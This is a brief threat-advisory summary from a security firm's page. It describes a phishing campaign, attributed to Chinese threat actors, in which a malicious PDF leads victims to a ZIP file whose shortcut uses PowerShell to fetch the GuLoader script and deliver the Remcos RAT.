Chinese Threat Actors Leverage Phishing and GuLoader to Distribute Remcos RAT
Chinese Threat Actors Leverage Phishing and GuLoader to Distribute Remcos RAT
Threat Level
Attack Report
For a detailed threat advisory, download the pdf file here
Summary
The malicious campaign described involves the distribution of a malicious PDF file through email, via phishing. The PDF file in this case redirects victims to a legitimate cloud-based platform, where they are prompted to download a ZIP file. Inside the ZIP file is a shortcut link, which when executed, uses PowerShell to download a heavily obfuscated VBS script known as GuLoader.
